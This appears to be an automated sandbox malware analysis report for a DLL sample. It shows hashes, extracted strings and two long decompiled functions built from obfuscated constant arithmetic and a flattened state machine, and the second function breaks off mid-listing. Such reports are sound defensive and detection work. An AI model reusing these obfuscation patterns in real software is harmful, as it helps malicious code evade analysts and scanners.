Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
API String ID: 0-500290626
Opcode ID: 1fe0f5bacd0bbd632c6fcf9cbe72bd86f8f4452578da3c7d845409414312742f
Instruction ID: 28c85440ac7fa4c1629162fc91d4d9d3a044be250da94ef9d96a4c30a4922582
Opcode Fuzzy Hash: 1fe0f5bacd0bbd632c6fcf9cbe72bd86f8f4452578da3c7d845409414312742f
Instruction Fuzzy Hash: CE12E0714093809BD3A9CF64C98AA8BFBE1FBC4348F108A1DE1DA96260D7B58549CF57

Uniqueness

Uniqueness Score: -1.00%

Function 0087D1BC, Relevance: 15.3, Strings: 12, Instructions: 347
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0087D1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t309;
				void* _t322;
				intOrPtr _t325;
				intOrPtr _t328;
				intOrPtr _t332;
				void* _t336;
				intOrPtr _t338;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t343;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t364;
				intOrPtr _t365;
				void* _t382;
				intOrPtr _t385;
				void* _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				intOrPtr _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_push(_a24);
				_t395 = __edx;
				_push(_a20);
				_v288 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(__ecx);
				_v312 = 0xeda4ef;
				_t397 = _t396 + 0x20;
				_v312 = _v312 + 0x7c87;
				_v312 = _v312 ^ 0x00e6bc42;
				_t346 = 0;
				_v356 = 0x83a7cc;
				_t349 = 0x902256d;
				_v356 = _v356 << 0xd;
				_v356 = _v356 | 0xd496e6a5;
				_v356 = _v356 ^ 0xf4f8676c;
				_v388 = 0x254bab;
				_v388 = _v388 | 0x2708e00f;
				_v388 = _v388 << 0xc;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0xebca5aa3;
				_v376 = 0x3a43eb;
				_v376 = _v376 + 0x5e30;
				_v376 = _v376 ^ 0x2d5dec97;
				_v376 = _v376 ^ 0x2d6492cf;
				_v324 = 0x965e68;
				_v324 = _v324 ^ 0x4fad172c;
				_v324 = _v324 ^ 0x4f30eea0;
				_v404 = 0x95ea8f;
				_t391 = 0x3c;
				_v404 = _v404 / _t391;
				_v404 = _v404 << 0xc;
				_v404 = _v404 | 0x93230375;
				_v404 = _v404 ^ 0xb7f3bbc9;
				_v296 = 0x950835;
				_v296 = _v296 + 0xffff217e;
				_v296 = _v296 ^ 0x0090010d;
				_v412 = 0x146e3b;
				_v412 = _v412 ^ 0xfee339d3;
				_v412 = _v412 | 0x08dab50c;
				_v412 = _v412 << 5;
				_v412 = _v412 ^ 0xdff21b2d;
				_v316 = 0x73cd3;
				_v316 = _v316 << 0xb;
				_v316 = _v316 ^ 0x39e53ce3;
				_v304 = 0x17d1c9;
				_v304 = _v304 | 0x32076b61;
				_v304 = _v304 ^ 0x32193df4;
				_v400 = 0xe22ffc;
				_v400 = _v400 * 0xf;
				_v400 = _v400 << 8;
				_v400 = _v400 >> 5;
				_v400 = _v400 ^ 0x020db90e;
				_v360 = 0x4e823d;
				_v360 = _v360 >> 7;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0x000f4c82;
				_v332 = 0x37cdc;
				_v332 = _v332 >> 0xe;
				_v332 = _v332 ^ 0x000cfe6d;
				_v392 = 0x36521e;
				_v392 = _v392 << 2;
				_v392 = _v392 ^ 0x01f25d84;
				_v392 = _v392 + 0xffff6602;
				_v392 = _v392 ^ 0x0122fac3;
				_v292 = 0x811559;
				_v292 = _v292 ^ 0x63e4ed2d;
				_v292 = _v292 ^ 0x636b0aa2;
				_v408 = 0xc9a98b;
				_v408 = _v408 ^ 0x273a7ab7;
				_t392 = 0x3d;
				_v408 = _v408 / _t392;
				_v408 = _v408 | 0xd16a0a28;
				_v408 = _v408 ^ 0xd1e35630;
				_v352 = 0x4de238;
				_v352 = _v352 ^ 0xe481f79a;
				_v352 = _v352 ^ 0xe4c0c54b;
				_v340 = 0x7e756a;
				_v340 = _v340 << 0xb;
				_v340 = _v340 ^ 0xf3ae0159;
				_v384 = 0x3029be;
				_v384 = _v384 + 0x835e;
				_v384 = _v384 ^ 0x9e5eea44;
				_v384 = _v384 ^ 0x9e65521f;
				_v364 = 0xcf8251;
				_v364 = _v364 + 0xffff400c;
				_t393 = 0x78;
				_v364 = _v364 * 0x5a;
				_v364 = _v364 ^ 0x48b0c21e;
				_v320 = 0x2b8f03;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x15cafa02;
				_v372 = 0xb0a86a;
				_v372 = _v372 ^ 0x35b8bfe6;
				_v372 = _v372 ^ 0xed8d6bf1;
				_v372 = _v372 ^ 0xd88344ec;
				_v344 = 0x8c38;
				_v344 = _v344 ^ 0x1ac013b0;
				_v344 = _v344 ^ 0x1ac5368a;
				_v348 = 0x2c1ac3;
				_v348 = _v348 >> 6;
				_v348 = _v348 ^ 0x0005c30d;
				_v300 = 0x3ae4ba;
				_v300 = _v300 >> 0xe;
				_v300 = _v300 ^ 0x00012364;
				_v396 = 0xe1901;
				_v396 = _v396 << 0xe;
				_v396 = _v396 + 0x39a8;
				_v396 = _v396 ^ 0x864e7189;
				_v368 = 0xe5c11e;
				_t394 = _v288;
				_v368 = _v368 / _t393;
				_v368 = _v368 | 0x7320cec6;
				_v368 = _v368 ^ 0x73273aba;
				_v336 = 0xf33546;
				_v336 = _v336 ^ 0x37961faf;
				_v336 = _v336 ^ 0x37663e0b;
				_v328 = 0x922129;
				_v328 = _v328 | 0xf90cd049;
				_v328 = _v328 ^ 0xf99851f2;
				_v416 = 0x9fd52c;
				_v416 = _v416 << 2;
				_v416 = _v416 * 0x22;
				_v416 = _v416 + 0xffff9e7e;
				_v416 = _v416 ^ 0x54e779e0;
				_v380 = 0x615361;
				_v380 = _v380 >> 1;
				_v380 = _v380 + 0x673e;
				_v380 = _v380 ^ 0x003e049c;
				_v308 = 0x9da5c1;
				_v308 = _v308 + 0xf72;
				_v308 = _v308 ^ 0x009db133;
				while(1) {
					L1:
					_t309 = 0xe35a561;
					do {
						while(1) {
							L2:
							_t399 = _t349 - 0x8816d6a;
							if(_t399 > 0) {
								break;
							}
							if(_t399 == 0) {
								_t325 =  *0x886228; // 0x0
								_t328 =  *0x886228; // 0x0
								_t332 =  *0x886228; // 0x0
								_t336 = E008767E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
								_t397 = _t397 + 0x30;
								if(_t336 == 0) {
									L25:
									_t349 = 0xc732dcb;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								} else {
									_t349 = 0x772d3d2;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								}
							} else {
								if(_t349 == 0x200f7b2) {
									if(_v280 >= _v308) {
										_t338 = E00872E5D( &_v284,  &_v276);
									} else {
										_t338 = E008680C0( &_v284);
									}
									_t394 = _t338;
									_t309 = 0xe35a561;
									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
									continue;
								} else {
									if(_t349 == 0x323c58a) {
										_t364 =  *0x886228; // 0x0
										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
										 *((intOrPtr*)(_t364 + 4)) = _t340;
										if(_t340 == 0) {
											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
										}
										_t341 =  *0x886228; // 0x0
										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
											_t365 =  *0x886228; // 0x0
											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
										} else {
											_t349 = 0x902256d;
											while(1) {
												L1:
												_t309 = 0xe35a561;
												goto L2;
											}
										}
									} else {
										if(_t349 == 0x54cb160) {
											_t343 = E00875779( &_v284, _t395, _v388, _v376, _v288);
											_t397 = _t397 + 0xc;
											if(_t343 != 0) {
												_t349 = 0x200f7b2;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										} else {
											if(_t349 != 0x772d3d2) {
												goto L35;
											} else {
												if(E00866B7A(_v340, _a16, _v384,  &_v268) == 0) {
													_t390 = 0x323c58a;
												} else {
													_t390 = 0x72c7f38;
													_t346 = 1;
												}
												_t349 = 0x939e27d;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										}
									}
								}
							}
							L38:
							return _t346;
						}
						if(_t349 == 0x902256d) {
							_t394 = 0;
							E0087FE2A(_v312, _v356, 0x100,  &_v260);
							_v276 = 0;
							_t349 = 0x54cb160;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t349 == 0x939e27d) {
								E00882B09(_v364, _v268, _v320, _v372);
								goto L25;
							} else {
								if(_t349 == 0xc732dcb) {
									E00882B09(_v344, _v284, _v348, _v300);
									E00882B09(_v396, _t394, _v368, _v336);
									E00882B09(_v328, _v276, _v416, _v380);
									_t397 = _t397 + 0x18;
									_t349 = _t390;
									L34:
									_t309 = 0xe35a561;
									goto L35;
								} else {
									if(_t349 != _t309) {
										goto L35;
									} else {
										_push(_t349);
										_push(_t349);
										_t322 = E0087CCA0(1, 0x40);
										_push( &_v260);
										_push(_t322);
										_push(_v304);
										_t382 = 0xb;
										E0086E404(_v316, _t382);
										_t397 = _t397 + 0x1c;
										_t349 = 0x8816d6a;
										goto L1;
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t349 != 0x72c7f38);
					goto L38;
				}
			}

0x0087d1c6
0x0087d1cd
0x0087d1d1
0x0087d1d8
0x0087d1df
0x0087d1e6
0x0087d1ed
0x0087d1f4
0x0087d1fb
0x0087d1fc
0x0087d1fd
0x0087d202
0x0087d20d
0x0087d210
0x0087d21a
0x0087d222
0x0087d224
0x0087d22c
0x0087d231
0x0087d236
0x0087d23e
0x0087d246
0x0087d24e
0x0087d256
0x0087d25b
0x0087d260
0x0087d268
0x0087d270
0x0087d278
0x0087d280
0x0087d288
0x0087d290
0x0087d298
0x0087d2a0
0x0087d2ae
0x0087d2b1
0x0087d2b5
0x0087d2ba
0x0087d2c2
0x0087d2ca
0x0087d2d5
0x0087d2e0
0x0087d2eb
0x0087d2f3
0x0087d2fb
0x0087d303
0x0087d308
0x0087d310
0x0087d318
0x0087d31d
0x0087d325
0x0087d330
0x0087d33b
0x0087d346
0x0087d353
0x0087d357
0x0087d35c
0x0087d361
0x0087d369
0x0087d371
0x0087d376
0x0087d37b
0x0087d383
0x0087d38b
0x0087d390
0x0087d398
0x0087d3a0
0x0087d3a5
0x0087d3ad
0x0087d3b5
0x0087d3bd
0x0087d3c8
0x0087d3d5
0x0087d3e0
0x0087d3e8
0x0087d3f6
0x0087d3fb
0x0087d401
0x0087d409
0x0087d411
0x0087d419
0x0087d421
0x0087d429
0x0087d431
0x0087d436
0x0087d43e
0x0087d446
0x0087d44e
0x0087d456
0x0087d45e
0x0087d466
0x0087d473
0x0087d47b
0x0087d47f
0x0087d487
0x0087d48f
0x0087d494
0x0087d49c
0x0087d4a4
0x0087d4ac
0x0087d4b4
0x0087d4bc
0x0087d4c4
0x0087d4cc
0x0087d4d4
0x0087d4dc
0x0087d4e1
0x0087d4e9
0x0087d4f4
0x0087d4fc
0x0087d507
0x0087d50f
0x0087d51c
0x0087d524
0x0087d52c
0x0087d53a
0x0087d541
0x0087d545
0x0087d54d
0x0087d555
0x0087d55d
0x0087d565
0x0087d56d
0x0087d575
0x0087d57d
0x0087d585
0x0087d58d
0x0087d597
0x0087d59b
0x0087d5a3
0x0087d5ab
0x0087d5b3
0x0087d5b7
0x0087d5bf
0x0087d5c7
0x0087d5d2
0x0087d5dd
0x0087d5e8
0x0087d5e8
0x0087d5e8
0x0087d5ed
0x0087d5ed
0x0087d5ed
0x0087d5ed
0x0087d5f3
0x00000000
0x00000000
0x0087d5f9
0x0087d716
0x0087d726
0x0087d742
0x0087d76a
0x0087d76f
0x0087d774
0x0087d785
0x0087d785
0x0087d5e8
0x0087d5e8
0x0087d5e8
0x00000000
0x0087d5e8
0x0087d776
0x0087d776
0x0087d5e8
0x0087d5e8
0x0087d5e8
0x00000000
0x0087d5e8
0x0087d5e8
0x0087d5ff
0x0087d605
0x0087d6dd
0x0087d6ed
0x0087d6df
0x0087d6df
0x0087d6df
0x0087d6f2
0x0087d6fb
0x0087d700
0x00000000
0x0087d60b
0x0087d611
0x0087d691
0x0087d69a
0x0087d69d
0x0087d6a0
0x0087d6a3
0x0087d6a8
0x0087d6ad
0x0087d6ad
0x0087d6b0
0x0087d6b8
0x0087d8c4
0x0087d8ca
0x0087d6be
0x0087d6be
0x0087d5e8
0x0087d5e8
0x0087d5e8
0x00000000
0x0087d5e8
0x0087d5e8
0x0087d613
0x0087d619
0x0087d677
0x0087d67c
0x0087d681
0x0087d687
0x0087d5e8
0x0087d5e8
0x0087d5e8
0x00000000
0x0087d5e8
0x0087d5e8
0x0087d61b
0x0087d621
0x00000000
0x0087d627
0x0087d647
0x0087d653
0x0087d649
0x0087d64b
0x0087d650
0x0087d650
0x0087d658
0x0087d5e8
0x0087d5e8
0x0087d5e8
0x00000000
0x0087d5e8
0x0087d5e8
0x0087d621
0x0087d619
0x0087d611
0x0087d605
0x0087d8d1
0x0087d8da
0x0087d8da
0x0087d795
0x0087d87f
0x0087d887
0x0087d890
0x0087d897
0x0087d89c
0x0087d8a3
0x0087d8aa
0x00000000
0x0087d79b
0x0087d7a1
0x0087d864
0x00000000
0x0087d7a7
0x0087d7ad
0x0087d817
0x0087d82a
0x0087d845
0x0087d84a
0x0087d84d
0x0087d8b1
0x0087d8b1
0x00000000
0x0087d7af
0x0087d7b1
0x00000000
0x0087d7b7
0x0087d7ca
0x0087d7cb
0x0087d7d0
0x0087d7dc
0x0087d7dd
0x0087d7de
0x0087d7ee
0x0087d7ef
0x0087d7f4
0x0087d7f7
0x00000000
0x0087d7f7
0x0087d7b1
0x0087d7ad
0x0087d7a1
0x00000000
0x0087d8b6
0x0087d8b6
0x00000000
0x0087d8c2

Strings

yT, xrefs: 0087D5A3
ju~, xrefs: 0087D429
}9, xrefs: 0087D79B
}9, xrefs: 0087D658
<9, xrefs: 0087D31D
>g, xrefs: 0087D5B7
0^, xrefs: 0087D270
8M, xrefs: 0087D411
aSa, xrefs: 0087D5AB
yT, xrefs: 0087D592
C:, xrefs: 0087D268
-c, xrefs: 0087D3C8

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
API String ID: 0-111235429
Opcode ID: 142d99a1892d6ca628ce6d0b465fb29ece8d6180bb3fac36422db4a8ae27249c
Instruction ID: ab2909eba82174199d73a0a54d8c7327e157d43e349191e0c0335d006fe60ed7
Opcode Fuzzy Hash: 142d99a1892d6ca628ce6d0b465fb29ece8d6180bb3fac36422db4a8ae27249c
Instruction Fuzzy Hash: 770220711083809FD369CF25C48AA5BBBF1FBC4358F50891DE69A9A261D7B1C949CF83

Uniqueness

Uniqueness Score: -1.00%

Function 008657B8, Relevance: 14.4, Strings: 11, Instructions: 616
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E008657B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				void _v12;
				void _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				void* _t657;
				intOrPtr _t715;
				void* _t716;
				void* _t717;
				void* _t725;
				void* _t729;
				void* _t737;
				void* _t740;
				intOrPtr _t746;
				void* _t798;
				void* _t814;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t833;
				void* _t834;
				void* _t840;

				_push(_a24);
				_t746 = __edx;
				_push(_a20);
				_v224 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x20);
				E0087FE29(_t657);
				_v108 = 0x7f0a1;
				_t834 = _t833 + 0x20;
				_t832 = 0;
				_t740 = 0xa8b367c;
				_t816 = 0x72;
				_v108 = _v108 / _t816;
				_v108 = _v108 ^ 0x000011d4;
				_v220 = 0x3ea28;
				_v220 = _v220 | 0x6e60dce4;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x7fdd8000;
				_v272 = 0xf906dc;
				_v272 = _v272 + 0x5e9;
				_t817 = 0x7a;
				_v272 = _v272 * 0x15;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0x70614800;
				_v264 = 0x600b37;
				_v264 = _v264 / _t817;
				_v264 = _v264 ^ 0x262493f0;
				_t818 = 0x3e;
				_v264 = _v264 * 0x11;
				_v264 = _v264 ^ 0x886a01f8;
				_v260 = 0xf3d497;
				_v260 = _v260 / _t818;
				_v260 = _v260 >> 6;
				_v260 = _v260 >> 3;
				_v260 = _v260 ^ 0x000001f7;
				_v156 = 0x8d2235;
				_v156 = _v156 >> 0xe;
				_t819 = 0xe;
				_v156 = _v156 * 0x5b;
				_v156 = _v156 ^ 0x0000c87c;
				_v292 = 0xf4d;
				_v292 = _v292 + 0x4732;
				_v292 = _v292 << 0x10;
				_v292 = _v292 << 0xe;
				_v292 = _v292 ^ 0xc0000000;
				_v216 = 0x258eaf;
				_v216 = _v216 * 0x48;
				_v216 = _v216 / _t819;
				_v216 = _v216 ^ 0x00c126f1;
				_v96 = 0xf75e54;
				_v96 = _v96 + 0xffff74b2;
				_v96 = _v96 ^ 0x00f6d306;
				_v268 = 0x92da;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 + 0x1646;
				_v268 = _v268 << 0xd;
				_v268 = _v268 ^ 0x02c9e000;
				_v196 = 0xf0429c;
				_t820 = 0x3d;
				_v196 = _v196 * 0x60;
				_v196 = _v196 >> 3;
				_v196 = _v196 ^ 0x0b431f50;
				_v232 = 0x6bfae5;
				_v232 = _v232 / _t820;
				_v232 = _v232 >> 4;
				_v232 = _v232 * 0x6e;
				_v232 = _v232 ^ 0x000c2b3c;
				_v40 = 0xa24143;
				_v40 = _v40 + 0xffff9191;
				_v40 = _v40 ^ 0x00a231cd;
				_v80 = 0x435983;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000556e3;
				_v180 = 0x94eafd;
				_v180 = _v180 + 0x1d08;
				_v180 = _v180 | 0xe944a694;
				_v180 = _v180 ^ 0xe9df3ebb;
				_v228 = 0xbcce84;
				_v228 = _v228 + 0xffff815d;
				_v228 = _v228 ^ 0xe4fbb881;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x0005fd7e;
				_v112 = 0x2fdad;
				_v112 = _v112 ^ 0x4ab81af1;
				_v112 = _v112 ^ 0x4abb9e1a;
				_v64 = 0x50dc85;
				_v64 = _v64 + 0xffff4d8c;
				_v64 = _v64 ^ 0x005cdb40;
				_v52 = 0x47f34d;
				_v52 = _v52 + 0xffff898a;
				_v52 = _v52 ^ 0x004c7feb;
				_v72 = 0xc369b0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 ^ 0x4c5d6799;
				_v132 = 0xe6e6b0;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 * 0x6c;
				_v132 = _v132 ^ 0x00059f00;
				_v172 = 0x544ea4;
				_v172 = _v172 << 5;
				_v172 = _v172 | 0xc018668b;
				_v172 = _v172 ^ 0xca962b34;
				_v148 = 0x61f17d;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 + 0xffff8980;
				_v148 = _v148 ^ 0xfffa8c30;
				_v100 = 0xf619bc;
				_v100 = _v100 >> 0xa;
				_v100 = _v100 ^ 0x00008a95;
				_v200 = 0xa94e7a;
				_v200 = _v200 + 0xa696;
				_v200 = _v200 + 0xffff4550;
				_v200 = _v200 ^ 0x00a03757;
				_v208 = 0x57e0ef;
				_v208 = _v208 ^ 0x592bbff9;
				_v208 = _v208 ^ 0x4b5d2b88;
				_v208 = _v208 ^ 0x1221726f;
				_v284 = 0x804076;
				_v284 = _v284 ^ 0x9dc3529f;
				_v284 = _v284 + 0x2ad8;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0xa19e17b3;
				_v176 = 0xb506b1;
				_v176 = _v176 | 0xc528794d;
				_v176 = _v176 + 0x810e;
				_v176 = _v176 ^ 0xc5bbfa9c;
				_v184 = 0x64408f;
				_v184 = _v184 << 3;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x00066ce1;
				_v252 = 0x9e8dfe;
				_v252 = _v252 | 0x2316ff28;
				_v252 = _v252 + 0xbb4b;
				_v252 = _v252 ^ 0x205df49d;
				_v252 = _v252 ^ 0x03c75996;
				_v192 = 0x20a385;
				_v192 = _v192 ^ 0x2edbbce0;
				_v192 = _v192 >> 5;
				_v192 = _v192 ^ 0x017066cd;
				_v312 = 0x989161;
				_v312 = _v312 + 0xa008;
				_v312 = _v312 + 0x4ac;
				_v312 = _v312 | 0x9f8d4417;
				_v312 = _v312 ^ 0x9f9ed397;
				_v320 = 0x6ba986;
				_t821 = 0x4d;
				_v320 = _v320 * 0x35;
				_v320 = _v320 + 0x6b8c;
				_v320 = _v320 + 0x347b;
				_v320 = _v320 ^ 0x164ad328;
				_v236 = 0xcaa528;
				_v236 = _v236 + 0x2035;
				_v236 = _v236 | 0x7bffa27f;
				_v236 = _v236 ^ 0x7bfdb1d6;
				_v276 = 0xb040eb;
				_v276 = _v276 * 0x3a;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00065548;
				_v280 = 0xf1680b;
				_v280 = _v280 >> 0xa;
				_v280 = _v280 >> 1;
				_v280 = _v280 >> 0xd;
				_v280 = _v280 ^ 0x00049c20;
				_v288 = 0x575f50;
				_v288 = _v288 << 0xe;
				_v288 = _v288 | 0xa77b0e2e;
				_v288 = _v288 * 0x52;
				_v288 = _v288 ^ 0x6fbbe03a;
				_v296 = 0x568d1e;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 >> 6;
				_v296 = _v296 >> 9;
				_v296 = _v296 ^ 0x0008fa1d;
				_v304 = 0xd1fef6;
				_v304 = _v304 << 0x10;
				_v304 = _v304 * 0x2d;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x7c01ef7f;
				_v92 = 0xea5a63;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x4b4e4928;
				_v76 = 0xf64e35;
				_v76 = _v76 + 0xbf9b;
				_v76 = _v76 ^ 0x00fbc5d2;
				_v248 = 0xc75c6;
				_v248 = _v248 ^ 0x54d7d0af;
				_v248 = _v248 / _t821;
				_v248 = _v248 | 0x9c98695d;
				_v248 = _v248 ^ 0x9d9ac3a5;
				_v256 = 0x504a74;
				_v256 = _v256 | 0x8719e45c;
				_v256 = _v256 * 0x7b;
				_v256 = _v256 ^ 0x8d2796a4;
				_v256 = _v256 ^ 0x85162cc6;
				_v84 = 0x519e4e;
				_v84 = _v84 ^ 0x8be7953d;
				_v84 = _v84 ^ 0x8bbbe938;
				_v168 = 0x311266;
				_v168 = _v168 ^ 0x18ab2cb8;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x3478f01c;
				_v60 = 0x61fbf7;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x000e504b;
				_v240 = 0xf8ae17;
				_v240 = _v240 >> 3;
				_v240 = _v240 | 0x050ada64;
				_v240 = _v240 ^ 0x567c7cbc;
				_v240 = _v240 ^ 0x53659cbf;
				_v68 = 0xee6d4a;
				_t374 =  &_v68; // 0xee6d4a
				_t822 = 0x49;
				_v68 =  *_t374 * 0xf;
				_v68 = _v68 ^ 0x0dff5dbc;
				_v300 = 0x550c32;
				_v300 = _v300 * 0x12;
				_v300 = _v300 + 0xffff8d7f;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x0bfb5da9;
				_v124 = 0x6baac1;
				_v124 = _v124 * 0x60;
				_t823 = 0x6f;
				_v124 = _v124 / _t822;
				_v124 = _v124 ^ 0x0084cf47;
				_v188 = 0xec1707;
				_v188 = _v188 << 0xc;
				_v188 = _v188 + 0x1505;
				_v188 = _v188 ^ 0xc1795754;
				_v244 = 0xd962f7;
				_v244 = _v244 + 0xffffa966;
				_v244 = _v244 | 0x93df07c8;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x49e87f80;
				_v48 = 0x35494e;
				_v48 = _v48 / _t823;
				_v48 = _v48 ^ 0x000830fa;
				_v88 = 0x633bdd;
				_v88 = _v88 + 0xc138;
				_v88 = _v88 ^ 0x006a2257;
				_v56 = 0x559d1c;
				_v56 = _v56 + 0xffff12d8;
				_v56 = _v56 ^ 0x005735ca;
				_v104 = 0xdd1aac;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0x0dd90d21;
				_v44 = 0x4278da;
				_t824 = 0x4e;
				_v44 = _v44 * 0x42;
				_v44 = _v44 ^ 0x112c636d;
				_v116 = 0x4ec2e;
				_v116 = _v116 + 0xffff43d8;
				_v116 = _v116 ^ 0x00065017;
				_v308 = 0xc5e4c2;
				_v308 = _v308 * 0x26;
				_v308 = _v308 + 0xa26d;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x25c4a583;
				_v36 = 0x60fc2;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x011987ae;
				_v140 = 0x8a5839;
				_v140 = _v140 << 0xb;
				_v140 = _v140 / _t824;
				_v140 = _v140 ^ 0x010a1534;
				_t814 = 0x30e419;
				_v204 = 0x180842;
				_v204 = _v204 ^ 0x577ac785;
				_v204 = _v204 + 0x1256;
				_v204 = _v204 ^ 0x5761cb73;
				_v136 = 0xcc77c3;
				_v136 = _v136 | 0x2e5c8e9b;
				_t825 = 0x3c;
				_v12 = 0xc2dfee2;
				_v16 = 0x8d06406;
				_v136 = _v136 * 0x19;
				_v136 = _v136 ^ 0x93985978;
				_v144 = 0xcb98e2;
				_v144 = _v144 ^ 0x2e2af391;
				_v144 = _v144 + 0xffff95d2;
				_v144 = _v144 ^ 0x2ee989ff;
				_v152 = 0x6e8dcb;
				_v152 = _v152 * 0x64;
				_v152 = _v152 ^ 0xf6de88b0;
				_v152 = _v152 ^ 0xddf9340f;
				_v160 = 0x1f41c3;
				_v160 = _v160 / _t825;
